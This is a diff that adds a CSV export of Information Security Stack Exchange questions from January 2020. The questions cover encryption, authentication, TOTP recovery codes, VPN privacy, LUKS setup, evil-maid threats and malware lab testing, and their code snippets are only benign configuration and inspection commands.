diff --git "a/stack_exchange/IS/Information Security 2020.csv" "b/stack_exchange/IS/Information Security 2020.csv" new file mode 100644--- /dev/null +++ "b/stack_exchange/IS/Information Security 2020.csv" @@ -0,0 +1,65322 @@ +Id,PostTypeId,AcceptedAnswerId,ParentId,CreationDate,DeletionDate,Score,ViewCount,Body,OwnerUserId,OwnerDisplayName,LastEditorUserId,LastEditorDisplayName,LastEditDate,LastActivityDate,Title,Tags,AnswerCount,CommentCount,FavoriteCount,ClosedDate,CommunityOwnedDate,ContentLicense +223502,1,223509,,1/1/2020 6:21,,0,88,"

And if so, what protections are available against this kind of thing?

+",113770,,,,,1/1/2020 12:58,Can an ethernet device plugged into a switch block all the other ethernet devices?,,1,1,,,,CC BY-SA 4.0 +223508,1,223512,,1/1/2020 11:44,,2,119,"

Suppose I symmetrically encrypt a file with a passphrase using GNU Privacy Guard and send it to a friend. I use the latest version and all the defaults, so AES-128 encryption is used, with the salt and s2k_count used for the password derivation function automatically generated.

+ +

I then tell my friend the passphrase and ask them to open it.

+ +

Are the salt, S2K type, s2k_count, and so on included in the file somehow, so that my friend can decrypt the file knowing only the password?

+ +

I suspect the answer is affirmative but I have not been able to find it in the documentation.
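
+ +

For reference, this is how I have been poking at it; if the parameters really are stored in the file, I would expect gpg's packet dump to show them (the file name is just an example):

gpg --symmetric --cipher-algo AES128 example.txt
+gpg --list-packets example.txt.gpg
+# the first packet should be a 'symkey enc packet' line listing the S2K mode, hash, salt and count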

+",223884,,223884,,1/1/2020 12:36,1/1/2020 13:31,Is all metadata necessary for decryption included in a symmetrically encrypted GNU Privacy Guard message?,,1,4,,,,CC BY-SA 4.0 +223513,1,223514,,1/1/2020 13:41,,1,116,"

Assume we only have access to the traffic between two modules (hardware, software, ...) and these modules communicate over SSL (PSK). Is it possible to assess the AES encryption of this traffic, i.e. features like key length, AES cipher mode, or any other important parameters?

+",79940,,,,,1/1/2020 14:18,AES Traffic Security Assesment,,2,2,,,,CC BY-SA 4.0 +223516,1,223517,,1/1/2020 14:49,,0,212,"

Just listened to a bit of the Darknet Diaries podcast episode on NotPetya. It’s insane how much damage it was able to cause even though it was only able to infect one machine initially. Which got me wondering: how could a similar large-scale attack happen?

+ +

Then I thought about cell towers. Our phones blindly connect to them every day. In fact, attackers can set up rogue towers that trick phones into connecting to them instead in order to perform a MITM attack. They just have to broadcast a stronger signal. That’s crazy.

+ +

So I was wondering: aren’t cell towers basically routers? If so, if an attacker was able to take control of one, and they had some sort of iOS/Android 0-day in how devices receive packets, could the attacker essentially spread a wide-scale attack like the one NotPetya launched?

+",224269,,,,,1/1/2020 15:29,"Are cell towers basically routers? If so, could one be hacked to spread malware to all connected devices?",,1,0,,,,CC BY-SA 4.0 +223518,1,,,1/1/2020 15:24,,3,161,"

From what I can tell there were two main TMP files present on the infected USB stick. The smaller of the two would run first and hook various functions related to viewing files so as to hide the LNK and TMP files.

+ +

While this was happening would it not raise suspicions? Someone would view the USB stick, see the six files and then they would just disappear?

+",,user224270,98538,,1/2/2020 11:25,1/2/2020 11:25,How did Stuxnet prevent the user from seeing the malicious files on a USB stick?,,0,0,1,,,CC BY-SA 4.0 +223519,1,223520,,1/1/2020 16:36,,1,93,"

Certificate authentication over HTTPS has always been one of my huge knowledge gaps, and I was trying to fill it today.

+ +

I have made some progress on client-side certificate authentication, but there are some fundamental questions I can't get my head around.

+ +

I have worked with third parties that used to send the certificate (and passphrase) over, and then we were able to start using their services. Unfortunately I wasn't involved in the process at all, so I'm not even sure whether it's my misunderstanding. Assuming that was correct (please let me know if not), my questions are:

+ +
    +
  • Do you exchange the pfx, with the private key as well as the certificate?
  • +
  • If I had a certificate signed by a trusted CA, why not just send that one, so the server would only need to validate it? Is it the case that the exchanged certificates are ad-hoc ones and the third party just needs to validate that they issued them?
  • +
  • Is this exchange where the Certificate Signing Request can be used? (See the sketch after this list.)
  • +
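
For the CSR point, the flow I imagine (a rough sketch using OpenSSL; file names and the subject are placeholders) would keep the private key on my side the whole time:

openssl req -new -newkey rsa:2048 -nodes -keyout client.key -out client.csr -subj '/CN=my-company-client'
+# send client.csr to the third party; they return client.crt signed by their CA
+openssl pkcs12 -export -in client.crt -inkey client.key -out client.pfx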
+ +

I understand the question is both simple and vague, but from what I have been reading for a while I can't really see the use case of this exchange.

+ +

Thanks

+",224271,,,,,1/1/2020 16:50,"In client side certificate authentication why, if, do we need to share the certificate",,1,0,,,,CC BY-SA 4.0 +223521,1,223525,,1/1/2020 16:52,,0,414,"

I use the free version of proton VPN because it has such a nice interface. From my understanding, when I connect to one of their VPNs located in the US, my information passes through an encrypted tunnel visible to my ISP, then to an entry node, then to a relay node, then to an exit node, then to where my internet activities are told to go.

+ +

Let's say I was a cautious internet ""criminal"", and my ISP believed me to be such. They've hired one of you to come out to their location and make some guesses about what I was using their service for, and you are really good at your job.

+ +

What would you be able to tell my ISP?

+ +

Tough question so thanks in advance!

+",120861,,,,,1/1/2020 20:18,What can my ISP see regarding my VPN tunnel?,,1,3,,1/10/2020 16:55,,CC BY-SA 4.0 +223523,1,,,1/1/2020 19:33,,1,98,"

For example, my website has Email/Password login and the ""sign in with Google"" button. If a user creates an account with their email and a password, then decides to sign in using the ""sign in with Google"" button, but using the same email as their email/password account, should we let them into their account? Or should the sign in attempt be blocked and the user redirected to the email/password login form?

+ +

Email/Password Account Email: example@gmail.com
+Google Account Login Attempt: example@gmail.com

+ +

Thanks!

+",224278,,,,,1/1/2020 20:51,What is a login flow method to prevent account jacking when your website has Email/Password sign in AND Google Sign in?,,1,0,,,,CC BY-SA 4.0 +223526,1,223528,,1/1/2020 20:32,,1,172,"

I'm planning to start a distributed crawler in order to avoid common limitations imposed by servers/CDN like rate limit, region filter, and others.

+ +

My idea is to have a central server and multiple agents that will run on different networks. These agents will be SOCKS5 servers. The central server will round-robin the requests in the pool of agents (SOCKS5 servers) to access the origin (website).

+ +
    +
  • Is the origin able to detect the server IP?
  • +
  • I don't have control over the agent (SOCKS5 server), so how safe is this connection? Is the owner of the SOCKS5 server able to see what I'm doing, or even change the request like a MITM attack?
  • +
  • Does something like this already exist?
  • +
+",224279,,6253,,1/1/2020 21:30,1/1/2020 21:30,Questions about SOCKS5 security,,1,2,,,,CC BY-SA 4.0 +223530,1,,,1/1/2020 21:57,,2,263,"

I’ve been thinking about P2P systems using asymmetric keys and wondering if there is anyway to recover an identity in the event it was compromised using some kind of web-of-trust.

+ +

This seems to be a large issue compared to a regular system (using a central authority) that can remove the intruder's access and restore control of the account to the real owner (Digicert, facebook, twitter, etc...).

+ +

Possible Peer-run Certificate Authority Design

+ +

What if a master key pair was generated by a user and then used to create a subkey? Then, using 16+ random bytes, the master key's private component could be encrypted. The public and encrypted private key parts could be stored on the network publicly. The public part of this master key would be the root identity for that user.

+ +

The owner could choose 5+ nodes on the network (friends?) to store parts of the passphrase used to encrypt the master key's private component, and then erase its own knowledge of those bytes.

+ +

The subkey would be the active user identity (with its own AES password protecting the private part). Should this client get phished, forget their password, or have someone steal their subkey's private component, we could use the peers to restore the master key and revoke this subkey. Then we could generate and sign a new subkey.

+ +

I'm not sure how this would work, other than the client sending a request to each node and the nodes verifying the client through some out-of-band way (phone call? Text?) before sending their part of the master key password.

+ +

Would this work? Are there any existing solutions to this problem?

+",3927,,3927,,1/6/2020 20:36,1/26/2022 4:03,Possible public/private identity recovery after compromise without a centeral authority?,,1,2,2,,,CC BY-SA 4.0 +223533,1,,,1/2/2020 1:14,,1,114,"

I wrote an implementation of a non-interactive zero-knowledge proof system as outlined in this research paper. As far as I can tell, it functions flawlessly as intended with text secrets such as authentication passwords.

+ +
# USER REGISTRATION:
+  # CLIENT-SIDE
+    client_zk = ZKProof.new(bits=256, curve_name=""secp256k1"")
+    signature = client_zk.create_signature(""Passw0rd"")
+    # send zk.params and signature to server for persistent storage
+
+
+# USER AUTHENTICATION:
+  # SERVER-SIDE
+    server_zk = ZKProof(client_zk.params)
+    token = ZKProof.random_token(bits=256)
+    # send token to client
+
+  # CLIENT-SIDE
+    challenge = client_zk.create_challenge(""Passw0rd"", token)
+    # send challenge to server
+
+  # SERVER-SIDE
+    if server_zk.prove_challenge(challenge, signature, token):
+      # user is authenticated...
+
+ +

While this use case is great for something like user databases, it does nothing for data protection. I am designing an application which will store encrypted text on the server. If I use a symmetric encryption algorithm, I can create proofs to ensure that the user is in possession of a particular password (assuming it was honestly registered when the key was created), however I have no way of VERIFYING that the encrypted data received by the server was indeed encrypted using that password since the server does not have access to the plain text OR encryption key. How can I best approach this?

+ +

Note: I CAN actually verify that a password (or key) was used to generate a zero-knowledge PROOF, but not the actual integrity of the data itself.

+",44529,,,,,1/2/2020 5:53,Verify Encryption Key with Non-Interactive Zero-Knowledge Proof,,0,4,,,,CC BY-SA 4.0 +223534,1,,,1/2/2020 1:16,,3,86,"

This is a duplicate of a stack overflow question, since it might apply more to security and authentication best practices.

+ +

I'm working on auth between a Chrome extension and Google Cloud Platform, and I'm trying to send the id_token JWT to an AWS server to retrieve user data (and/or establish a session?).

+ +

My question is this -- how can I prevent chrome extensions with tabs permissions from reading the GET request or the redirected URI which has the fully-validated user JWT?

+ +

The JWT confirms that a user is who they are, but how do I know my Chrome Extension is the one making the request to my backend?

+ +

I have a few ideas:

+ +
    +
  1. Maybe I can make a private window that only my extension can control

  2. +
  3. Maybe I can somehow use the nonce or get the nonce from my server first

  4. +
  5. Maybe my chrome extension has a private key or some way to verify itself with my backend, which has the public key

  6. +
+ +

Any help would be appreciated, it's difficult to research this specific scenario.

+ +
+ +
var url = 'https://accounts.google.com/o/oauth2/v2/auth' +
+          '?client_id=' + encodeURIComponent(chrome.runtime.getManifest().oauth2.client_id) +
+          '&response_type=id_token' +
+          '&redirect_uri=' + encodeURIComponent(chrome.identity.getRedirectURL()) +
+          '&scope=' + encodeURIComponent(chrome.runtime.getManifest().oauth2.scopes.join(' ')) +
+          '&nonce=' + Math.floor(Math.random() * 10000000);
+
+chrome.windows.create({ url: 'about:blank' }, function ({ tabs }) {
+    chrome.tabs.onUpdated.addListener(
+        function googleAuthorizationHook(tabId, changeInfo, tab) {
+            if (tab.id === tabs[0].id) {
+                if (tab.title !== 'about:blank') {
+                    console.log(url);
+                    if (tab.title.startsWith(chrome.identity.getRedirectURL())) {
+                        const id_token = tab.title.split('#')[1];
+                        console.log(id_token);
+                    } else {
+                        console.error(tab.title)
+                    }
+
+                    chrome.tabs.onUpdated.removeListener(googleAuthorizationHook);
+                    chrome.tabs.remove(tab.id);
+                }
+            }
+        }
+    );
+
+    chrome.tabs.update(tabs[0].id, { 'url': url });
+});
+
+",90061,,,,,1/2/2020 1:16,Can Chrome Extensions steal OAuth tokens from redirect-uri?,,0,1,,1/10/2020 16:55,,CC BY-SA 4.0 +223535,1,223593,,1/2/2020 2:53,,1,405,"

What is the difference between a digital certificate and a digital signature?

+ +

I read on the internet that a digital signature is the result of encrypting, with a private key, the 'hash' of the message to be sent. As for the digital certificate, it is not very clear to me what it is.

+",224059,,6253,,1/2/2020 22:01,1/2/2020 22:08,Difference between certificate and digital signature,,3,0,1,1/2/2020 22:03,,CC BY-SA 4.0 +223544,1,223547,,1/2/2020 9:27,,1,381,"

In TOTP implementations, it's always suggested that you give your users recovery codes. Should I treat these like tokens? Display them once and hash them?

+ +

If so, I'd love to know why. If not, I'm curious too.
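
+ +

To make that concrete, what I mean by 'display them once and hash them' is roughly this (a sketch, not a vetted design; the code length and count are arbitrary):

import secrets, hashlib
+
+def generate_recovery_codes(n=10):
+    # show these to the user exactly once
+    return [secrets.token_hex(8) for _ in range(n)]
+
+def digests_for_storage(codes):
+    # persist only the digests, never the plain codes
+    return [hashlib.sha256(c.encode()).hexdigest() for c in codes]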

+",224297,,6253,,1/2/2020 9:39,1/2/2020 11:00,How should I store TOTP recovery codes on the server end?,,1,5,,,,CC BY-SA 4.0 +223553,1,223569,,1/2/2020 11:44,,0,134,"

Hopefully this question won't come across too much as a 'which product is best' question, as that is not my intention.

+ +

I am moving into a larger property and I would like to set up some home security. I'm not 100% sure what I should be aware of and how to possibly mitigate being broken into. I also do not know the area much at all; it appears to be a quiet English town.

+ +

My main concerns are physical security and security of my home network.

+ +

My thoughts on physical security were to either just get an alarm or some kind of IP camera setup covering the front and rear of the property, but I have heard some rather alarming news about Nest camera hacks. I do have a few Raspberry Pis that could be set up as Pi IP cameras, but I'm not sure if that would make things more or less secure. One consideration is that the property has a shed which will probably contain some bikes and tools that I would like to secure, which leads me toward cameras. Is having a set of cameras considered more secure? And if so, to what extent and against what threat?

+ +

For home network security, I'm far more concerned: the area generally has fairly tech-savvy people due to lots of technical companies nearby. I've not moved in yet, but I will probably just use whatever router is supplied by the CSP with the nicest looking package. I'll then change the SSID and any passwords that came by default.

+ +

While I'm fairly technical, I do not know that much about security, and what I do know I can't seem to apply to this: how do I take what I think might be an issue and break it up into threats, actions, and so on? Threat analysis, I guess it would be called?

+ +

So after all that,

+ +
    +
  • What threats should I be wary of concerning physical security of a home?
  • +
  • What threats are there to my home network?
  • +
  • What actions can I take to mitigate some of the threats
  • +
+",211839,,,,,1/2/2020 15:56,Household attack vectors and mitigations,,1,0,,1/20/2020 6:38,,CC BY-SA 4.0 +223554,1,,,1/2/2020 13:07,,2,1502,"

There is this web app which uses Cloudflare, and to bypass certain things I had to find a way to access the actual web server directly. I tried numerous things and I finally think I have found the actual server's IP, but it seems like direct access to the IP is blocked, as I am greeted with this error.

+ +
Error 1003 Ray ID:
+Direct IP access not allowed
+
+ +

What header (or Referer value?) should I supply with my original request so that the web server accepts my request as a request routed via Cloudflare's reverse proxy?

+ +

In other words, I want the actual server to believe I am coming via Cloudflare. I believe that to do this we have to supply a specific header or a specific Referer value, but I can't figure out what to supply in the actual request. Any help would be appreciated.

+ +

Thanks.

+",224309,,,,,1/2/2020 13:42,Is there any way to pretend like we are routing our request via cloudflare?,
,1,2,,1/21/2020 5:21,,CC BY-SA 4.0 +223556,1,223559,,1/2/2020 13:48,,0,720,"

My company has a 'bring your own device' policy. You connect your device to the WiFi, and then open a citrix environment through a web portal. Basically, everything inside the citrix env is company-software/email. Outside is your own software/mail/browser.

+ +

I know that anything I do online outside of the citrix environment still transfers over company WiFi with the possibility that it is inspected.

+ +

Very recently however, the connection to the internet outside the citrix environment ceased to work, I assume by design, since now I get a pop-up asking me to install a certificate that is clearly issued by the company. This should restore internet connection.

+ +

My questions:

+ +

Will this give them any additional ways to monitor my machine over the old situation?

+ +

Will they for example be able to inspect end-to-end encrypted messages?

+ +

Is it a good idea to accept this kind of a certificate given the fact that I am a contractor and work for multiple clients?

+ +

Additional point to consider: some of our development requires work/testing outside of this Citrix environment, due to shortcomings of the VM. Still, there is no need or possibility to connect to any company resource (network shares etc.) from outside the VM.

+ +

EDIT: My question is specifically what kind of (additional) negative consequences this certificate will/might have, versus before, when we could access the internet without any certificate installed. Therefore I think this question is different from 'Can my employer see what I do on the internet when I am connected to the company network?'

+ +

EDIT: Example: this happens when opening Outlook:

+",55793,,55793,,1/2/2020 14:54,1/2/2020 14:54,Forced to install certificate on my laptop when using company WiFi. Risk?,,1,11,,1/2/2020 15:14,,CC BY-SA 4.0 +223557,1,,,1/2/2020 14:25,,12,1880,"

I've been using Bitwarden as my main password keeper and would like to ask if it's safe. I know that nothing is 100% safe, but I still want to know if it is worth it.

+ +

All my passwords are different, apart from a few accounts that share a password.

+ +

I know there is also KeePass, but I can't really be bothered to back it up each time, because I also use my mobile a lot and Bitwarden has a mobile application that is really helpful.

+",224315,,76718,,1/2/2020 14:30,2/22/2021 5:01,Is BitWarden trusted?,,1,1,1,,,CC BY-SA 4.0 +223558,1,,,1/2/2020 14:39,,0,79,"

I reported a flaw to the security team and they changed the UIDs from regular integers to a hash kind of thing, like this: XXXX-XXXX-and-so-on.

+ +

I still want to try and bypass things, but I don't understand what kind of hashing this is. I have seen a lot of applications using this kind of hash for tokens, UIDs, etc. Characters are separated by a - (dash or hyphen) in these kinds of tokens.

+",224317,,,,,1/2/2020 14:44,Understanding patch for my report,,1,3,,,,CC BY-SA 4.0 +223564,1,,,1/2/2020 15:11,,1,163,"

What possible risks/attack vectors could be introduced by allowing my server application to make outbound calls to a 3rd party REST API? The 3rd party REST API is off premises and owned and operated by the 3rd party.

+ +

In order to clarify and limit scope let's just focus on attacks that result in impact on our business (so DoS and things like that would count). Let's also assume that it's properly protected via HTTPS. The users will be other businesses and the on-boarding would be controlled, so there's very little room for bad actors to inject themselves as legitimate system users.

+ +

The data from the 3rd party is not essential/used/trusted in our system. In fact our calling out is purely a notification of an event being sent in a fire-and-forget scenario.

+",111417,,129883,,1/2/2020 17:28,1/2/2020 17:28,Security Risk of outbound web calls,,1,4,,1/21/2020 5:31,,CC BY-SA 4.0 +223567,1,,,1/2/2020 15:25,,0,286,"

Recently, when staying in a rented apartment, I signed in to the YouTube app on the smart TV by entering a code using chrome on my tablet to pair them. I was planning to log out before I vacated the apartment but forgot to do so.

+ +

What are the security implications of this? I am not bothered by people seeing my viewing history on YouTube etc., but obviously I wouldn't like anyone to access any other Google services via my account.

+",37242,,,,,1/21/2022 20:06,Didn't log out of YouTube - Is this a problem?,,1,2,1,,,CC BY-SA 4.0 +223572,1,,,1/2/2020 16:14,,2,782,"

There is a requirement for an unattended, publicly accessible machine that I have: only allow company-approved USB devices (e.g., USB mass storage, keyboard, mouse, Bluetooth, etc.) and block all the rest (non-approved).

+ +

Even though the PID, VID and serial number are unique identifiers for USB devices, if somebody knows that information he/she can easily create a USB device with the identifiers mentioned above and produce an 'approved' USB device.

+ +

Is there any way that I can add unique and secure identifiers to USBs (except VID, PID, S/N) and set up a mechanism to differentiate between company approved USBs and non-approved ones and allow only the approved ones?

+ +

Expected result: Secure USB for devices that are left unattended (e.g., kiosk) in public places.

+",224324,,6253,,1/2/2020 17:20,10/24/2021 1:05,Secure USB (unique identifier),,3,2,,,,CC BY-SA 4.0 +223573,1,,,1/2/2020 16:21,,0,159,"

I am about to go travelling to some high risk countries where corrupt officials will most likely try to go through my laptop and external HDD.

+ +

I am using Linux Mint and LUKS. Could someone please tell me, based on these pictures, whether I have encrypted them both properly? This includes the cache (or whatever it is called), as I would hate to leak information. I know that /boot can stay unencrypted.

+ +

Picture of my laptop's HDD:

+ +

Picture of external HDD after I entered password:

+ +

I can provide more information upon request.

+ +

Thank you

+",111952,,,,,1/3/2020 14:05,Have I used LUKS properly?,,1,4,,,,CC BY-SA 4.0 +223577,1,223585,,1/2/2020 17:29,,0,97,"

Searched around and couldn't find a similar question.

+ +

I've gotten tired of waiting for a 2FA SMS to arrive every time I check my email. So I set up an app similar to, say, Google Authenticator on my desktop, so that when I get prompted for a code I can just copy/paste it from my toolbar.

+ +

I can see how this basically defeats the purpose of 2FA though, right?

+",79228,,6253,,1/2/2020 17:31,1/2/2020 18:49,Is there a security problem with having two factor auth running on the same machine that's requesting access?,,1,2,,,,CC BY-SA 4.0 +223578,1,,,1/2/2020 17:30,,0,94,"

A similar question has been asked here:

+ +

Can hackers detect my operating system?

+ +

My question is: if a malicious file has been downloaded from a secure 3rd party website (i.e. not owned/controlled by the malware writer), would this malware be able to detect which operating system it has been downloaded to? Or would the malware need to be tailored to one particular OS?

+",215324,,,,,1/2/2020 17:30,Can an already downloaded malicious file detect the operating system?,,0,3,,,,CC BY-SA 4.0 +223586,1,,,1/2/2020 18:57,,2,204,"

If you have multiple products/sites under a common domain, what are the advantages and disadvantages, from user convenience to security, of having a common login page? For example, this site uses https://security.stackexchange.com/users/login for login. Google uses accounts.google.com and Microsoft uses login.live.com. However Apple doesn't have a common page, Facebook has the login form on the home page and most banks do too.

+",168571,,,,,1/27/2022 10:56,What are the tradeoffs between a common login site and login-per-site?,,2,2,,,,CC BY-SA 4.0 +223587,1,223594,,1/2/2020 19:04,,1,2099,"

I noticed this while testing SNI-based HTTPS filtering for fun. My test was to block mail.yahoo.com, but allow other yahoo.com services. Here are my tests using Chrome:

+ +
    +
  1. Access mail.yahoo.com by entering the full URL https://mail.yahoo.com: BLOCKED

  2. +
  3. Access mail.yahoo.com by logging into my Yahoo account via https://yahoo.com, and clicking the ""Mail"" link: NOT BLOCKED

  4. +
+ +

I ran a packet capture while re-creating test #2 and I see there are no Client Hello messages with the mail.yahoo.com name in the SNI extension field. This is why I assume the web filter, which relies on inspecting the SNI extension field, is not blocking the website.

+ +

I am trying to understand why I wouldn't see a Client Hello message w/ mail.yahoo.com in the SNI field when running test #2. Is the browser somehow using the same TLS session since the *.yahoo.com certificate is valid for both www.yahoo.com and mail.yahoo.com? I am interested to know more about how this works.

+",224327,,224327,,1/3/2020 2:56,1/3/2020 2:56,No Client Hello w/ SNI when accessing website's subdomain via link,,1,6,,,,CC BY-SA 4.0 +223588,1,,,1/2/2020 19:25,,0,183,"

If the intention of an attacker is to execute an arbitrary client-side script in the context of a web application, is XSS the only possible attack, other than compromising the server with an RCE or a sub-resource supply chain attack?

+ +
    +
  • XSS is Cross-Site Scripting, be it reflected, persistent or DOM-based.
  • +
  • A sub-resource supply chain attack is where you compromise a sub-resource such as CSS, JavaScript, Flash objects, etc. by compromising the supply chain, i.e. compromising the CDNs, S3 buckets, etc., or by MITM-ing a sub-resource loaded over a non-HTTPS channel.
  • +
+",121141,,485,,1/10/2020 14:12,1/10/2020 14:12,Is there a vulnerability other than XSS which can result in client side script execution?,,1,0,,,,CC BY-SA 4.0 +223597,1,,,1/2/2020 22:27,,2,702,"

Why I believe this question is not a duplicate: +There are multiple questions dealing with the exploitation of a locked computer on this site, but most of the answers are focused on exploiting a non-hardened system in default configuration. I believe that in recent years, with major advances in encryption and hardware+software authentication (secure boot, bitlocker, virtualization, UEFI,...), the threat model for a hardened laptop is significantly different and therefore, I'm reasking this question under the following scenario:

+ +

Technical assumptions:

+ +
    +
  1. I'm using a modern Windows 10 Pro laptop, with the OS and all drivers updated to latest versions.
  2. +
  3. Laptop is locked, with following authentication methods: fingerprint reader, strong password, reasonably strong PIN (probably would not survive an offline brute-force).
  4. +
  5. Internal drive is encrypted with PIN-less Bitlocker, using TPM.
  6. +
  7. UEFI is password-protected, booting from external drive requires UEFI password, network boot is disabled, Secure Boot is on.
  8. +
  9. I'm connected to the same network as an attacker (attacker may potentially even own the network).
  10. +
  11. The laptop has an enabled Thunderbolt 3 port, but before any connected device is accepted, it must be authorized by the user (which should not be possible on the lock screen).
  12. +
  13. Laptop has a free M.2 slot inside, dis/re-assembly is possible in under a minute.
  14. +
+ +

Assuming I'm sitting somewhere with an attacker, I lock my laptop and leave for 5 minutes, is it feasible for the attacker to gain access to my laptop (either by bypassing the lock screen, or extracting files using some other method (extracting the bitlocker key,...)) before I return, under the condition that I mustn't notice anything suspicious after coming back?

+",224340,,224340,,1/3/2020 2:14,1/3/2020 2:14,What is the physical security (Evil Maid) threat model of a modern hardened laptop?,,2,5,,,,CC BY-SA 4.0 +223602,1,223605,,1/3/2020 0:14,,1,320,"

I'm learning about security, and it seems that all of the security problems I have seen come from input from malicious actors.

+ +

I was told that it's possible to check for the existence of bugs in a program, but not possible to check that a program doesn't have any bugs. Following from this, this means that it's not possible to prove that a program is 100% secure (correct me if I'm wrong).

+ +

So I was thinking, is it possible for a program to be hacked in some way without explicitly taking user input?

+ +

And by hack, I mean making the program do something it wasn't designed to do.

+ +

For example: somehow forcing a program to take in user input by other means even though the actual program code doesn't take in user input.

+ +

Or subverting the execution of a simple Hello World program and making it execute a shell.

+ +

Is it possible to craft a program that doesn't explicitly take user input, but can still be hacked?

+",199580,,6253,,1/3/2020 12:50,1/3/2020 12:50,Can a program that doesn't explicitly take user input be hacked?,,2,5,0,,,CC BY-SA 4.0 +223603,1,,,1/3/2020 0:26,,6,4416,"

What is the security risk of not disabling TLS v1.1/1.2?

+ +

I have multiple websites on Cloudflare

+",162382,,,,,1/3/2020 2:56,main reasons to disable TLS 1.1/1.2,,2,2,1,,,CC BY-SA 4.0 +223608,1,,,1/3/2020 3:04,,2,220,"

So I booted up two Windows 7 64-bit SP1 machines in VirtualBox and shared their network; the operating systems are vulnerable to the SMB exploit that the WannaCry ransomware uses. The issue is that when I'm running Wireshark I don't see any attempts at the SMB exploit on the other machine. Is it because WannaCry is detecting the VM?

+ +

I want to see SMB activity in my lab, which is my main goal of this test.

+ +

+",224102,,,,,1/3/2020 5:29,Wannacry testing in lab - Not getting SMB scan attempts,,1,2,,,,CC BY-SA 4.0 +223609,1,,,1/3/2020 4:12,,0,89,"

I'm running https://ngrok.com/ on Windows 10 Pro with a custom app built on a Node server running locally (it can't be Linux) for a test suite that integrates both web and desktop. So I'm basically hosting a server on the machine for another internal machine to access via the internet (there is no other way to solve the problem). I'm not considering securing the app itself, but in case someone discovers the IP of the machine, what can I do to secure it? The machine cannot use a VPN; it's not connected to a domain, just plugged into Ethernet. Only minimal software is running and everything else was removed. Everything is up to date and Bitdefender is installed.

+",222398,,,,,9/29/2020 8:02,How to protect Server running on Windows 10 with Node Ngrok against attackers?,,1,0,,,,CC BY-SA 4.0 +223610,1,223611,,1/3/2020 4:43,,0,184,"

I'm working on improving the security of my own system by mitigating the chance that sensitive information (e.g. encryption keys) stored in RAM is inadvertently written to disk. As of now I know of three common ways this can occur and how they could be mitigated (the corresponding commands are sketched after the list):

+ +
    +
  1. The contents of RAM are copied to hiberfil.sys when Windows Hibernates + +
      +
    • Solution: Disable Windows Hibernation
    • +
  2. +
  3. Some contents of RAM are copied into the swap file. + +
      +
    • Solution: Encrypt the swap file.
    • +
  4. +
  5. Memory Dumps during Windows Blue-screens. + +
      +
    • Solution: Disable memory dump file generation
    • +
  6. +
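
For reference, these are the commands I believe map to the three mitigations above (pieced together from various guides, so please correct me if they are wrong; run from an elevated prompt):

rem 1. disable hibernation (removes hiberfil.sys)
+powercfg /hibernate off
+rem 2. encrypt the page file at the filesystem level
+fsutil behavior set EncryptPagingFile 1
+rem 3. disable kernel memory dump creation
+wmic recoveros set DebugInfoType=0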
+ +

Excluding these (as well as tools specifically designed to dump memory) are there any other reasons RAM could unintentionally be written to disk by the operating system?

+ +

I would really appreciate any help I could get!

+",224347,,,,,1/3/2020 5:06,In what ways can the contents of RAM be (inadvertently) written to disk?,,1,2,,,,CC BY-SA 4.0 +223614,1,,,1/3/2020 6:49,,1,122,"

I am looking for best practices for username/password login. People have different views on client-side hashing of the password.

+ +

From Google's recommendation +https://cloud.google.com/solutions/modern-password-security-for-system-designers.pdf

+ +

The client side hashing should be implemented as below:

+ +
+

Have the client computer hash the password using a cryptographically secure algorithm and a unique salt provided by the server. When the password is received by the server, hash it again with a different salt that is unknown to the client. Be sure to store both salts securely.

+
+ +
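
If I read that correctly, the flow would be something like this (a rough sketch; the algorithm, iteration count and names are my own placeholders):

import hashlib
+
+def client_side(password: str, client_salt: bytes) -> bytes:
+    # runs on the client, with the salt the server handed out
+    return hashlib.pbkdf2_hmac('sha256', password.encode(), client_salt, 100_000)
+
+def server_side(client_result: bytes, server_salt: bytes) -> bytes:
+    # runs on the server, with a second salt the client never sees; this value is stored
+    return hashlib.pbkdf2_hmac('sha256', client_result, server_salt, 100_000)

+ +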

My questions are

+ +
    +
  1. I agree the server should send a (unique) salt to the client. But why does the server need to hash the client result again with another salt?

  2. +
  3. Does the above mechanism suggest the server should store both salts as separate columns in the database table? And assume both salts are static (not changed per each login?)

  4. +
  5. SSL/TLS has mechanisms to avoid replay attacks. Does the above mechanism provide extra value to counter replay attacks? I don't see any random factor in the static salts, and I cannot see how anything here addresses replay attacks.

  6. +
+",224345,,,,,1/3/2020 6:49,Why server side hashing is required if the client side hashing is already in place?,,0,6,,,,CC BY-SA 4.0 +223615,1,223617,,1/3/2020 7:07,,1,91,"

I want to create a system of transferable documents (each identified by its ID) whose owner can transfer ownership of a document to another person (identified by his/her ID).

+ +

For example:

+ +
    +
  1. Alice; owner of document 1.
  2. +
  3. Alice transfers her ownership of that document to Bob.
  4. +
  5. Now: Bob is owner of document 1.
  6. +
  7. Alice says she is the owner of document 1, but she fails.
  8. +
+ +

(Item 4 is very important)

+ +

We can make sure that the document and its author remain untouched by using digital signatures. But if Alice made a copy of that document, signed while she was still the owner, there would be no way to prevent her from claiming she is still the owner of the document.

+ +

So we would need something that makes a signature expire whenever the document is transferred.

+ +

IF I HAD A DATABASE: I would simply add that signature to a ban list.

+ +

Are there any solutions to preserve the uniqueness of this document?

+",223270,,10863,,1/3/2020 8:23,1/3/2020 8:23,How can I preserve the uniqueness of a document without a database?,,1,0,,,,CC BY-SA 4.0 +223619,1,,,1/3/2020 9:35,,0,154,"

We're a company selling embedded devices. Our devices use U-Boot and Linux, both being GPL, and therefore we have to release the source code as used to build our binaries.

+ +

We're in the process of implementing more security measures (both to increase reliability and to protect against IP theft), so of course encryption becomes a topic. Some people call for the encryption of U-Boot and the kernel (which is supported by the hardware for the bootloader, and by U-Boot for the kernel).

+ +

Is there any reasoning for protecting our GPL-covered binaries by encryption? We already have secure boot in place (HW for the bootloader, U-Boot for the kernel, ...).

+",224360,,224360,,1/3/2020 10:42,1/3/2020 10:42,Is there a reasoning encrypting a GPL binary where I have to publish the sourcecode?,,1,0,,,,CC BY-SA 4.0 +223621,1,,,1/3/2020 10:38,,1,333,"

We are currently evaluating which authorization type to use for our production AppSync APIs.

+ +

As per AWS docs(https://docs.aws.amazon.com/appsync/latest/devguide/security.html, https://aws.amazon.com/blogs/mobile/using-multiple-authorization-types-with-aws-appsync-graphql-apis/ ), AppSync supports multiple authorization types - like API Key based (passing a static API Key), IAM role based.

+ +

My questions are around the differences between the API-key-based approach and the IAM-based one:

+ +

1) Why is using a static API key considered bad for production use cases if all calls to AppSync are HTTPS-based (which provides good encryption)?

+ +

